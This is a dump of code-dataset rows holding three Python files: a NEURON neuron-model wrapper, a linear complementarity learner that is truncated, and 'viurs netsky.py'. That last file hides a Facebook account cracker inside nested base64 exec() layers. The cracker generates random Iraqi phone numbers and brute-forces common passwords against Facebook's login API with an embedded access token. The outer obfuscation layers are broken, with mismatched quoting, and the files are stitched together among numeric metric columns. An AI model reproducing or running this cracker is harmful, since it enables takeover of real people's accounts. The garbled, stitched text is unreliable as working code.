| 0.780235
| 0.002905
| 0
| 0.720339
| 0
| 0
| 0.184404
| 0.041604
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059322
| false
| 0
| 0.042373
| 0.012712
| 0.148305
| 0.008475
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6a2df6d518d69cff798813900fa87ad8315152c
| 1,917
|
py
|
Python
|
examples/single_compartment/cell_wrapper.py
|
pbcanfield/ASCT
|
27dba80c612c844971c545a1af0758272900f8c7
|
[
"MIT"
] | null | null | null |
examples/single_compartment/cell_wrapper.py
|
pbcanfield/ASCT
|
27dba80c612c844971c545a1af0758272900f8c7
|
[
"MIT"
] | 1
|
2021-10-12T21:38:18.000Z
|
2021-10-12T21:38:18.000Z
|
examples/single_compartment/cell_wrapper.py
|
pbcanfield/ASCT
|
27dba80c612c844971c545a1af0758272900f8c7
|
[
"MIT"
] | null | null | null |
from asct.src.Cell import Cell
from neuron import h
import pdb
#This class takes a NEURON HOC file as an input creates a wrapper
#which can be run by sbi for simulation data.
class CellToOptimize(Cell):
def __init__(self):
#Load in the cell via hoc file.
template_name = "CA3PyramidalCell"
template_dir = "CA3Cell_Qian/CA3.hoc"
#Load the template directory.
h.load_file(template_dir)
#Get the cell from the h object.
invoke_cell = getattr(h, template_name)
#Exctract the neuron cell object itself. This also inserts the cell into the neuron simulator.
self.__cell = invoke_cell()
super(CellToOptimize, self).__init__()
#REQUIRED FUNCTION
def set_parameters(self,parameter_list,parameter_values):
for sec in self.__cell.all:
for index, key in enumerate(parameter_list):
setattr(sec, key, parameter_values[index])
#REQUIRED FUNCTION
def get_recording_section(self):
return self.__cell.soma[0](0.5)
class ModelCell(Cell):
def __init__(self):
#Load in the cell via hoc file.
template_name = "CA3PyramidalCell"
template_dir = "CA3Cell_Qian/CA3.hoc"
#Load the template directory.
h.load_file(template_dir)
#Get the cell from the h object.
invoke_cell = getattr(h, template_name)
#Exctract the neuron cell object itself. This also inserts the cell into the neuron simulator.
self.__cell = invoke_cell()
super(ModelCell, self).__init__()
#REQUIRED FUNCTION
def set_parameters(self,parameter_list,parameter_values):
for sec in self.__cell.all:
for index, key in enumerate(parameter_list):
setattr(sec, key, parameter_values[index])
#REQUIRED FUNCTION
def get_recording_section(self):
return self.__cell.soma[0](0.5)
| 35.5
| 102
| 0.66771
| 254
| 1,917
| 4.811024
| 0.295276
| 0.03437
| 0.062193
| 0.02455
| 0.841244
| 0.841244
| 0.841244
| 0.841244
| 0.841244
| 0.841244
| 0
| 0.008421
| 0.256651
| 1,917
| 54
| 103
| 35.5
| 0.849123
| 0.282733
| 0
| 0.774194
| 0
| 0
| 0.052863
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.096774
| 0.064516
| 0.419355
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6e0a2e6eddf4ce4cc78f70a01ed36158c3ff3ea
| 15,628
|
py
|
Python
|
viurs netsky.py
|
covid192/iraquv3
|
797b6935a4c2c079983edf456bd458e802f2e890
|
[
"MIT"
] | null | null | null |
viurs netsky.py
|
covid192/iraquv3
|
797b6935a4c2c079983edf456bd458e802f2e890
|
[
"MIT"
] | null | null | null |
viurs netsky.py
|
covid192/iraquv3
|
797b6935a4c2c079983edf456bd458e802f2e890
|
[
"MIT"
] | 1
|
2021-05-06T03:02:43.000Z
|
2021-05-06T03:02:43.000Z
|
#Coded By Veurs Netsky
#Tele@veuresnetsky
#وقل ربي زدني علما #
import base64
exec(base64.b64decode("#Compile By ARIS STYA CHANNEL
#TIM JANDA
import base64
exec(base64.b64decode("#Compile By ARIS STYA CHANNEL
#TIM JANDA
import base64
exec(base64.b64decode("#Compile By ARIS STYA CHANNEL
#TIM JANDA
import base64
exec(base64.b64decode("IyBDb2RlZCBieSBEdWxMYWggKGZiLm1lL2R1bGFoeikgLS0KIyBSZWNvZGUgQnkgSWtyYS0xOAoKaW1wb3J0IG9zLCByZSwgcmVxdWVzdHMsIGNvbmN1cnJlbnQuZnV0dXJlcwpmcm9tIHJhbmRvbSBpbXBvcnQgcmFuZGludAoKaW1wb3J0IG9zLCBzeXMKTSA9ICdcMDMzWzE7MzNtJwpDID0gJ1wwMzNbMTszMW0nCkQgPSAnXDAzM1sxOzMybScKCmRlZiB3YSgpOgogICAgb3Muc3lzdGVtKCd4ZGctb3BlbiBodHRwczovL3d3dy5mYWNlYm9vay5jb20vMTE4NDYyMzU2ODYwMjQ2JykKCgpkZWYgcmVzdGFydCgpOgogICAgbmd1bGFuZyA9IHN5cy5leGVjdXRhYmxlCiAgICBvcy5leGVjbChuZ3VsYW5nLCBuZ3VsYW5nLCAqc3lzLmFyZ3YpCm9zLnN5c3RlbSgnY2xlYXInKSAgICAKcHJpbnQoRCkKCm9zLnN5c3RlbSgnZmlnbGV0ICJTaWRyYWVsZXp6IicpCgpwcmludCggIiIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgClwwMzNbMTs5Nm1bK10gVG9vTCBCeSBTaWRyYSBFTEV6egpcMDMzWzE7OTZtWytdIGlTIFRvb0wgRnJlZSAKXDAzM1sxOzk2bVsrXSBUb29MIENyYWNrIEZhY2Vib29rIElyYXFWMyAKIiIiKQoKcHJpbnQoQykKCnByaW50KCcgICAgICAgICAgIDw9PT09PT09PT09PT09PT09PT09PT09PT4gICAgICAgICAnKQp1c2VyID0gaW5wdXQoJ1wwMzNbMTs5Nm1bK11ceDFiWzE7OTdtVXNlck5hbWUgXHgxYlsxOzk2bT0gJykKaW1wb3J0IGdldHBhc3MKc2FuZGkgPSBpbnB1dCgnXDAzM1sxOzk2bVsrXVx4MWJbMTs5N21QQVNTV09SRCBceDFiWzE7OTZtPSAnKQppZiBzYW5kaSA9PSAnSXJhcXYzJyBhbmQgdXNlciA9PSAnSXJhcXYzJzoKICAgIHByaW50KCAnQW5kYSBUZWxhaCBMb2dpbicpCiAgICBzeXMuZXhpdAplbHNlOgogICAgcHJpbnQoICdMb2dpbiBHQUdBTCwgU2lsYWhrYW4gaHVidW5naSBBRE1JTicpCiAgICB3YSgpCiAgICByZXN0YXJ0KCkKb3Muc3lzdGVtKCdjbGVhcicpCgpsaWIgPSBpbnB1dCgiIiJcMDMzWzkybQogX19fXyAgXyAgICAgXyAgICAgICAgICAgICAgICBfCi8gX19ffChfKSBfX3wgfF8gX18gX18gXyAgX19ffCB8IF9fXyBfX19fX19fXwpcX19fIFx8IHwvIF9gIHwgJ19fLyBfYCB8LyBfIFwgfC8gXyBcXyAgL18gIC8gICAgICBfX18pIHwgfCAoX3wgfCB8IHwgKF98IHwgIF9fLyB8ICBfXy8vIC8gLyAvCnxfX19fL3xffFxfXyxffF98ICBcX18sX3xcX19ffF98XF9fXy9fX18vX19ffAoKXDAzM1sxOzkzbVsrXSBUb29MIEJ5IFNpZHJhIEVMRXp6ClwwMzNbMTs5Nm1bK10gaVMgVG9vTCBGcmVlIApcMDMzWzE7OTVtWytdIFRvb0wgQ3JhY2sgRmFjZWJvb2sgSXJhcVYzIAoKICBcMDMzWzE7OTNtICAgICAgICAgICAgPD09PT09PT09PT09PT09PT09PT09PT09PgpcMDMzWzE7OTJtWzFdIERvd25sb2FkIGxpYiAmIHVwZGF0ZQpcMDMzWzE7OTJtWzJdIHBhc3MKClwwMzNbMTs5MW1bK10gUGxlYXNlIENob2ljZSA+PlwwMzNbMTs5Mm0gIiIiKQoKaWYgbGliID09ICIxIjoKICAgIG9zLnN5c3RlbSgncGtnIHVwYWR0ZSAmJiBwa2cgdXBncmFkZScpCiAgICBvcy5zeXN0ZW0oJ3BrZyBpbnN0YWxsIGZpc2gnKQogICAgb3Muc3lzdGVtKCdwa2cgaW5zdGFsbCBweXRob24yJykKICAgIG9zLnN5c3RlbSgncGtnIGluc3RhbGwgZmlnbGV0JykKICAgIG9zLnN5c3RlbSgncGtnIGluc3RhbGwgdG9pbGV0JykKICAgIG9zLnN5c3RlbSgnY2xlYXInKQogICAgcGFzcwplbHNlOgogICAgb3Muc3lzdGVtKCdjbGVhcicpCiAgICBwYXNzCm9zLnN5c3RlbSgnY2xlYXInKQpkZWYgYnJ1dGUodXNlciwgcGFzc3MpOgogIHRyeToKICAgIGZvciBwdyBpbiBwYXNzczoKICAgICAgcGFyYW1zPXsKICAgICAgICAnYWNjZXNzX3Rva2VuJzogJzM1MDY4NTUzMTcyOCU3QzYyZjhjZTlmNzRiMTJmODRjMTIzY2MyMzQzN2E0YTMyJywKICAgICAgICAnZm9ybWF0JzogJ0pTT04nLAogICAgICAgICdzZGtfdmVyc2lvbic6ICcyJywKICAgICAgICAnZW1haWwnOiB1c2VyLAogICAgICAgICdsb2NhbGUnOiAnZW5fVVMnLAogICAgICAgICdwYXNzd29yZCc6IHB3LAogICAgICAgICdzZGsnOiAnaW9zJywKICAgICAgICAnZ2VuZXJhdGVfc2Vzc2lvbl9jb29raWVzJzogJzEnLAogICAgICAgICdzaWcnOiAnM2Y1NTVmOTlmYjYxZmNkN2FhMGM0NGY1OGY1MjJlZjYnLAogICAgICB9CiAgICAgIGFwaT0naHR0cHM6Ly9iLWFwaS5mYWNlYm9vay5jb20vbWV0aG9kL2F1dGgubG9naW4nCiAgICAgIHJlc3BvbnNlPXJlcXVlc3RzLmdldChhcGksIHBhcmFtcz1wYXJhbXMpCiAgICAgIGlmIHJlLnNlYXJjaCgnKEVBQUEpXHcrJywgc3RyKHJlc3BvbnNlLnRleHQpKToKICAgICAgICBwcmludCgnICBbTElWRV0gJXMgLT4gJXMgJyUoc3RyKHVzZXIpLCBzdHIocHcpKSkKICAgICAgICBicmVhawogICAgICBlbGlmICd3d3cuZmFjZWJvb2suY29tJyBpbiByZXNwb25zZS5qc29uKClbJ2Vycm9yX21zZyddOgogICAgICAgIHByaW50KCcgIFtDSEVLXSAlcyAtPiAlcyAnJShzdHIodXNlciksIHN0cihwdykpKQogICAgICAgIGJyZWFrCiAgZXhjZXB0OiBwYXNzCgpkZWYgcmFuZG9tX251bWJlcnMoKToKICBkYXRhID0gW10KICBvcy5zeXN0ZW0oJ2NscycgaWYgb3MubmFtZSA9PSAnbnQnIGVsc2UgJ2NsZWFyJykKICBvcy5zeXN0ZW0oJ2NsZWFyJykKICBwcmludChEKQogIG9zLnN5c3RlbSgnZmlnbGV0ICJJUkFRIicpCiAgcHJpbnQoJycnCiBcMzNbMzE7MW1bIFRvb0wgQ3JhY2sgRmFjZWJvb2sgSXJhcVYzICBdCgpcMDMzWzE7OTNtWytdIENob29zZSB0aGUgbnVtYmVyWzVdLCBvayBFeGFtcGxlOgpcMDMzWzE7OTVtWytdIDk2NDc1ClwwMzNbMTs5NW1bK10gOTY0NzcKXDAzM1sxOzk1bVsrXSA5NjQ3OAogICcnJykKICBrb2RlPXN0cihpbnB1dCgnXDMzWzMzOzFtRW50ZXIgdGhlIHN0YXJ0aW5nIG51bWJlcjogJykpCiAgZXhpdCgnXDMzWzM2OzFtIFRoZSBudW1iZXIgbXVzdCBiZSA1IGRpZ2l0cywgbm8gbGVzcyBhbmQgbm8gbW9yZS4nKSBpZiBsZW4oa29kZSkgPCA1IGVsc2UgJycKICBleGl0KCdcMzNbMzY7MW0gVGhlIG51bWJlciBtdXN0IGJlIDUgZGlnaXRzLCBubyBsZXNzIGFuZCBubyBtb3JlLicpIGlmIGxlbihrb2RlKSA+IDUgZWxzZSAnJwogIG9zLnN5c3RlbSgnY2xlYXInKQogIG9zLnN5c3RlbSgndG9pbGV0IC1mIGJpZyBTaWRyYWVsZXp6IC1GIGdheScpCiAgcHJpbnQoIiIiCiAgXDAzM1sxOzkzbSAgICAgICAgICAgIDw9PT09PT09PT09PT09PT09PT09PT09PT4KICAKICBcMDMzWzE7OTJtWytdIFRvb0wgQnkgU2lkcmEgRUxFenoKICBcMDMzWzE7OTJtWytdIGlTIFRvb0wgRnJlZSAKICBcMDMzWzE7OTJtWytdIFRvb0wgQ3JhY2sgRmFjZWJvb2sgSXJhcVYzCiAgCiAgXDAzM1sxOzkzbSAgICAgICAgICAgIDw9PT09PT09PT09PT09PT09PT09PT09PT4KICAiIiIpCiAgb3Muc3lzdGVtKCd4ZGctb3BlbiBodHRwczovL3QubWUvTzFPT0InKQogIGptbD1pbnQoaW5wdXQoJycnCiAgXDMzWzM2OzFtRW50ZXIgdGhlIG51bWJlciA6ICcnJykpCiAgW2RhdGEuYXBwZW5kKHsndXNlcic6IHN0cihlKSwgJ3B3JzpbMTEyMjMzNDQ1NSwxMjM0NTEyMzQ1LDExMjIzMzQ0NTU2NiwxMjM0NTU0MzIxXX0pIGZvciBlIGluIFtzdHIoa29kZSkrJycuam9pbihbJyVzJyUocmFuZGludCgwLDkpKSBmb3IgaSBpbiByYW5nZSgwLDgpXSkgZm9yIGUgaW4gcmFuZ2Uoam1sKV1dCiAgcHJpbnQoIiIiCiAgXDAzM1sxOzkzbSAgICAgICAgICAgICYgJiAmICYgJiAmICYgJiAmICYgJiAmCiAgIiIiKQogIHdpdGggY29uY3VycmVudC5mdXR1cmVzLlRocmVhZFBvb2xFeGVjdXRvcihtYXhfd29ya2Vycz0zMCkgYXMgdGg6CiAgICB7dGguc3VibWl0KGJydXRlLCB1c2VyWyd1c2VyJ10sIHVzZXJbJ3B3J10pOiB1c2VyIGZvciB1c2VyIGluIGRhdGF9CiAgcHJpbnQoJ1xuICBEb25lOiknKQoKZGVmIHJhbmRvbV9lbWFpbCgpOgogIG9zLnN5c3RlbSgnY2xlYXInKQogIG9zLnN5c3RlbSgndG9pbGV0IC1mIGJpZyBUZWxlZ3JhbSAtRiBnYXkgfCBsb2xjYXQnKQogIG9zLnN5c3RlbSgneGRnLW9wZW4gaHR0cHM6Ly90Lm1lL1RUX1JRJykKICBvcy5zeXN0ZW0oJ2NsZWFyJykKICBvcy5zeXN0ZW0oJ3RvaWxldCAtZiBiaWcgWW91VHViZSAtRiBnYXkgfCBsb2xjYXQnKQogIG9zLnN5c3RlbSgneGRnLW9wZW4gaHR0cHM6Ly95b3V0dWJlLmNvbS9jaGFubmVsL1VDekZ2aUZZQ09KSTRJd2hkVk9RVHFJdycpIAoKZGVmIHBpbGloKCk6CiAgcHJpbnQoRCkKCiAgb3Muc3lzdGVtKCdmaWdsZXQgIlNpZHJhZWxlenoiJykKICBwcmludCgiIiIKICAxLiBcMzNbMzM7MW1Ub29MIENyYWNrIEZhY2Vib29rIElyYXFWMyBcMzNbMzc7MW0KICAyLiBcMzNbMzM7MW1Gb2xsb3cgU2lkcmEgRUxFenoKICAiIiIpCiAgb3Muc3lzdGVtKCd4ZGctb3BlbiBodHRwczovL3QubWUvVFRfUlEnKQogIHBpbD1pbnQoaW5wdXQoJyAgQ2hvb3NlIE51bWJlcjogJykpCiAgaWYgcGlsID09IDE6CiAgICByYW5kb21fbnVtYmVycygpCiAgZWxpZiBwaWwgPT0gMjoKICAgIHJhbmRvbV9lbWFpbCgpCiAgZWxzZToKICAgIGV4aXQoJyAgZ29vZGx1Y2snKQoKcGlsaWgoKSBpZiBfX25hbWVfXyA9PSAnX19tYWluX18nIGVsc2UgZXhpdCgnU29ycnksIHNvbWV0aGluZyB3cm9uZywgcGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4nKQoKCiAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgCgoK"))"))"))"))
| 2,604.666667
| 15,550
| 0.998272
| 16
| 15,628
| 975.0625
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091643
| 0.000832
| 15,628
| 5
| 15,551
| 3,125.6
| 0.907461
| 0.003519
| 0
| 0
| 0
| 0
| 0.997174
| 0.997174
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
5b2b93f3c581679bcf03ef0ffacc8f0f768c756a
| 86,229
|
py
|
Python
|
examples/trifinger/lcs/task_driven.py
|
wanxinjin/manipulation
|
3850c90b9be757163c4c87b47344d085bbb9307d
|
[
"BSD-3-Clause"
] | null | null | null |
examples/trifinger/lcs/task_driven.py
|
wanxinjin/manipulation
|
3850c90b9be757163c4c87b47344d085bbb9307d
|
[
"BSD-3-Clause"
] | null | null | null |
examples/trifinger/lcs/task_driven.py
|
wanxinjin/manipulation
|
3850c90b9be757163c4c87b47344d085bbb9307d
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from casadi import *
import numpy.linalg as la
import matplotlib.pyplot as plt
# class for learning LCS from the hybrid data
class LCS_learner:
def __init__(self, n_state, n_control, n_lam,
A=None, B=None, C=None, D=None, E=None, G=None, H=None, lcp_offset=None,
stiffness=0.):
self.n_lam = n_lam
self.n_state = n_state
self.n_control = n_control
self.lam = SX.sym('lam', self.n_lam)
self.x = SX.sym('x', self.n_state)
self.u = SX.sym('u', self.n_control)
self.theta = []
if A is None:
self.A = SX.sym('A', self.n_state, self.n_state)
self.theta += [vec(self.A)]
else:
self.A = DM(A)
if B is None:
self.B = SX.sym('B', self.n_state, self.n_control)
self.theta += [vec(self.B)]
else:
self.B = DM(B)
if C is None:
self.C = SX.sym('C', self.n_state, self.n_lam)
self.theta += [vec(self.C)]
else:
self.C = DM(C)
if D is None:
self.D = SX.sym('D', self.n_lam, self.n_state)
self.theta += [vec(self.D)]
else:
self.D = DM(D)
if E is None:
self.E = SX.sym('E', self.n_lam, self.n_control)
self.theta += [vec(self.E)]
else:
self.E = DM(E)
if G is None:
self.G = SX.sym('G', self.n_lam, self.n_lam)
self.theta += [vec(self.G)]
else:
self.G = DM(G)
if H is None:
self.H = SX.sym('H', self.n_lam, self.n_lam)
self.theta += [vec(self.H)]
else:
self.H = DM(H)
if lcp_offset is None:
self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
self.theta += [vec(self.lcp_offset)]
else:
self.lcp_offset = DM(lcp_offset)
self.theta = vcat(self.theta)
self.n_theta = self.theta.numel()
self.F = stiffness * np.eye(self.n_lam) + self.G @ self.G.T + self.H - self.H.T
self.F_fn = Function('F_fn', [self.theta], [self.F])
self.D_fn = Function('D_fn', [self.theta], [self.D])
self.E_fn = Function('E_fn', [self.theta], [self.E])
self.G_fn = Function('G_fn', [self.theta], [self.G])
self.H_fn = Function('H_fn', [self.theta], [self.H])
self.A_fn = Function('A_fn', [self.theta], [self.A])
self.B_fn = Function('B_fn', [self.theta], [self.B])
self.C_fn = Function('C_fn', [self.theta], [self.C])
self.lcp_offset_fn = Function('lcp_offset_fn', [self.theta], [self.lcp_offset])
# self.dyn_offset_fn = Function('dyn_offset_fn', [self.theta], [self.dyn_offset])
# initialize the parameter
self.val_theta = 0.1 * np.random.randn(self.n_theta)
def differetiable(self, gamma=1e-3, epsilon=0.5):
# define the dynamics loss
self.x_next = SX.sym('x_next', self.n_state)
data = vertcat(self.x, self.u, self.x_next)
# self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam + self.dyn_offset
self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam
dyn_loss = dot(self.dyn - self.x_next, self.dyn - self.x_next)
# lcp loss
self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
self.phi = SX.sym('phi', self.n_lam)
lcp_loss = dot(self.lam, self.phi) + 1 / gamma * dot(self.phi - self.dist,
self.phi - self.dist)
# total loss
# loss = (1 - epsilon) * dyn_loss + epsilon * lcp_loss
loss = dyn_loss + lcp_loss / epsilon
# loss = dot(self.dyn[2:4] - self.x_next[2:4], self.dyn[2:4] - self.x_next[2:4]) + lcp_loss / epsilon
# loss = (dyn_loss + lcp_loss / epsilon) / (0.5+dot(self.x_next, self.x_next))
# establish the qp solver
lam_phi = vertcat(self.lam, self.phi)
data_theta = vertcat(self.x, self.u, self.x_next, self.theta)
quadprog = {'x': vertcat(self.lam, self.phi), 'f': loss, 'p': data_theta}
opts = {'printLevel': 'none', }
self.inner_QPSolver = qpsol('inner_QPSolver', 'qpoases', quadprog, opts)
# compute the jacobian from lam to theta
self.loss_fn = Function('loss_fn', [data, self.theta, lam_phi], [loss])
self.dloss_fn = Function('dloss_fn', [data, self.theta, lam_phi], [jacobian(loss, self.theta).T])
self.dyn_loss_fn = Function('dyn_loss_fn', [data, self.theta, lam_phi], [dyn_loss])
self.lcp_loss_fn = Function('lcp_loss_fn', [data, self.theta, lam_phi], [lcp_loss])
# compute the second order derivative
grad_loss = jacobian(loss, lam_phi).T
L = diag(lam_phi) @ grad_loss
self.L_fn = Function('L_fn', [data, self.theta, lam_phi], [L]) # this is just for testing
# compute the gradient of lam_phi_opt with respect to theta
dL_dsol = jacobian(L, lam_phi)
dL_dtheta = jacobian(L, self.theta)
dsol_dtheta = -inv(dL_dsol) @ dL_dtheta
self.dsol_dtheta_fn = Function('dsol_dtheta_fn', [data, self.theta, lam_phi], [dsol_dtheta])
# this is just for testing
dloss2 = jacobian(loss, self.theta) + jacobian(loss, lam_phi) @ dsol_dtheta
self.dloss2_fn = Function('dloss2_fn', [data, self.theta, lam_phi], [dloss2.T])
# compute the second order derivative
dloss_dtheta = jacobian(loss, self.theta).T
ddloss = jacobian(dloss_dtheta, self.theta) + jacobian(dloss_dtheta, lam_phi) @ dsol_dtheta
self.ddloss_fn = Function('ddloss_fn', [data, self.theta, lam_phi], [ddloss])
def compute_lambda(self, x_batch, u_batch, x_next_batch):
# prepare the data
batch_size = x_batch.shape[0]
data_batch = np.hstack((x_batch, u_batch, x_next_batch))
theta_val_batch = np.tile(self.val_theta, (batch_size, 1))
data_theta_batch = np.hstack((data_batch, theta_val_batch))
# compute the lam_phi solution
sol_batch = self.inner_QPSolver(lbx=0.0, p=data_theta_batch.T)
loss_opt_batch = sol_batch['f'].full().flatten()
lam_phi_opt_batch = sol_batch['x'].full().T
return lam_phi_opt_batch, loss_opt_batch
def gradient_step(self, x_batch, u_batch, x_next_batch, lam_phi_opt_batch, second_order=False):
batch_size = x_batch.shape[0]
data_batch = np.hstack((x_batch, u_batch, x_next_batch))
theta_val_batch = np.tile(self.val_theta, (batch_size, 1))
# compute the gradient value
dtheta_batch = self.dloss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
dtheta_mean = dtheta_batch.full().mean(axis=1)
# compute the losses
loss_batch = self.loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
dyn_loss_batch = self.dyn_loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
lcp_loss_batch = self.lcp_loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
loss_mean = loss_batch.full().mean()
dyn_loss_mean = dyn_loss_batch.full().mean()
lcp_loss_mean = lcp_loss_batch.full().mean()
dtheta_hessian = dtheta_mean
if second_order is True:
hessian_batch = self.ddloss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
# compute the mean hessian
hessian_sum = 0
for i in range(batch_size):
hessian_i = hessian_batch[:, i * self.n_theta:(i + 1) * self.n_theta]
hessian_sum += hessian_i
hessian_mean = hessian_sum / batch_size
damping_factor = 1
u, s, vh = np.linalg.svd(hessian_mean)
s = s + damping_factor
damped_hessian = u @ np.diag(s) @ vh
dtheta_hessian = (inv(damped_hessian) @ DM(dtheta_mean)).full().flatten()
return dtheta_mean, loss_mean, dyn_loss_mean, lcp_loss_mean, dtheta_hessian
def dyn_prediction(self, x_batch, u_batch):
self.differetiable()
batch_size = x_batch.shape[0]
theta_val_batch = np.tile(self.val_theta, (batch_size, 1))
xu_theta_batch = np.hstack((x_batch, u_batch, theta_val_batch))
# establish the lcp solver
lcp_loss = dot(self.dist, self.lam)
xu_theta = vertcat(self.x, self.u, self.theta)
quadprog = {'x': self.lam, 'f': lcp_loss, 'g': self.dist, 'p': xu_theta}
opts = {'printLevel': 'none'}
lcp_Solver = qpsol('lcp_solver', 'qpoases', quadprog, opts)
self.lcp_fn = Function('dist_fn', [self.x, self.u, self.lam, self.theta], [self.dist, dot(self.dist, self.lam)])
self.lcp_dist_fn = Function('dist_fn', [self.x, self.u, self.lam, self.theta], [self.dist])
# establish the dynamics equation
dyn_fn = Function('dyn_fn', [self.x, self.u, self.lam, self.theta], [self.dyn])
# compute the lam_batch
sol_batch = lcp_Solver(lbx=0., lbg=0., p=xu_theta_batch.T)
lam_opt_batch = sol_batch['x'].full().T
# compute the next state batch
x_next_batch = dyn_fn(x_batch.T, u_batch.T, lam_opt_batch.T, theta_val_batch.T).full().T
return x_next_batch, lam_opt_batch
# class for learning LCS from the hybrid data
class LCS_learner_backup:
def __init__(self, n_state, n_control, n_lam,
A=None, B=None, C=None, D=None, E=None, G=None, H=None, lcp_offset=None,
stiffness=0.):
self.n_lam = n_lam
self.n_state = n_state
self.n_control = n_control
self.lam = SX.sym('lam', self.n_lam)
self.x = SX.sym('x', self.n_state)
self.u = SX.sym('u', self.n_control)
self.theta = []
if A is None:
self.A = SX.sym('A', self.n_state, self.n_state)
self.theta += [vec(self.A)]
else:
self.A = DM(A)
if B is None:
self.B = SX.sym('B', self.n_state, self.n_control)
self.theta += [vec(self.B)]
else:
self.B = DM(B)
if C is None:
self.C = SX.sym('C', self.n_state, self.n_lam)
self.theta += [vec(self.C)]
else:
self.C = DM(C)
if D is None:
self.D = SX.sym('D', self.n_lam, self.n_state)
self.theta += [vec(self.D)]
else:
self.D = DM(D)
if E is None:
self.E = SX.sym('E', self.n_lam, self.n_control)
self.theta += [vec(self.E)]
else:
self.E = DM(E)
if G is None:
self.G = SX.sym('G', self.n_lam, self.n_lam)
self.theta += [vec(self.G)]
else:
self.G = DM(G)
if H is None:
self.H = SX.sym('H', self.n_lam, self.n_lam)
self.theta += [vec(self.H)]
else:
self.H = DM(H)
if lcp_offset is None:
self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
self.theta += [vec(self.lcp_offset)]
else:
self.lcp_offset = DM(lcp_offset)
self.theta = vcat(self.theta)
self.n_theta = self.theta.numel()
self.F = stiffness * np.eye(self.n_lam) + self.G @ self.G.T + self.H - self.H.T
self.F_fn = Function('F_fn', [self.theta], [self.F])
self.D_fn = Function('D_fn', [self.theta], [self.D])
self.E_fn = Function('E_fn', [self.theta], [self.E])
self.G_fn = Function('G_fn', [self.theta], [self.G])
self.H_fn = Function('H_fn', [self.theta], [self.H])
self.A_fn = Function('A_fn', [self.theta], [self.A])
self.B_fn = Function('B_fn', [self.theta], [self.B])
self.C_fn = Function('C_fn', [self.theta], [self.C])
self.lcp_offset_fn = Function('lcp_offset_fn', [self.theta], [self.lcp_offset])
# self.dyn_offset_fn = Function('dyn_offset_fn', [self.theta], [self.dyn_offset])
def differetiable(self, gamma=1e-3, epsilon=0.5):
# define the dynamics loss
self.x_next = SX.sym('x_next', self.n_state)
data = vertcat(self.x, self.u, self.x_next)
# self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam + self.dyn_offset
self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam
dyn_loss = dot(self.dyn - self.x_next, self.dyn - self.x_next)
# lcp loss
self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
self.phi = SX.sym('phi', self.n_lam)
lcp_loss = dot(self.lam, self.phi) + 1 / gamma * dot(self.phi - self.dist,
self.phi - self.dist)
# total loss
# loss = (1 - epsilon) * dyn_loss + epsilon * lcp_loss
dyn_loss + lcp_loss / epsilon
loss = dot(self.dyn[2:4] - self.x_next[2:4], self.dyn[2:4] - self.x_next[2:4]) + lcp_loss / epsilon
# loss = (dyn_loss + lcp_loss / epsilon) / (0.5+dot(self.x_next, self.x_next))
# establish the qp solver
lam_phi = vertcat(self.lam, self.phi)
data_theta = vertcat(self.x, self.u, self.x_next, self.theta)
quadprog = {'x': vertcat(self.lam, self.phi), 'f': loss, 'p': data_theta}
opts = {'printLevel': 'none', }
self.inner_QPSolver = qpsol('inner_QPSolver', 'qpoases', quadprog, opts)
# compute the jacobian from lam to theta
self.loss_fn = Function('loss_fn', [data, self.theta, lam_phi], [loss])
self.dloss_fn = Function('dloss_fn', [data, self.theta, lam_phi], [jacobian(loss, self.theta).T])
self.dyn_loss_fn = Function('dyn_loss_fn', [data, self.theta, lam_phi], [dyn_loss])
self.lcp_loss_fn = Function('lcp_loss_fn', [data, self.theta, lam_phi], [lcp_loss])
# compute the second order derivative
grad_loss = jacobian(loss, lam_phi).T
L = diag(lam_phi) @ grad_loss
self.L_fn = Function('L_fn', [data, self.theta, lam_phi], [L]) # this is just for testing
# compute the gradient of lam_phi_opt with respect to theta
dL_dsol = jacobian(L, lam_phi)
dL_dtheta = jacobian(L, self.theta)
dsol_dtheta = -inv(dL_dsol) @ dL_dtheta
self.dsol_dtheta_fn = Function('dsol_dtheta_fn', [data, self.theta, lam_phi], [dsol_dtheta])
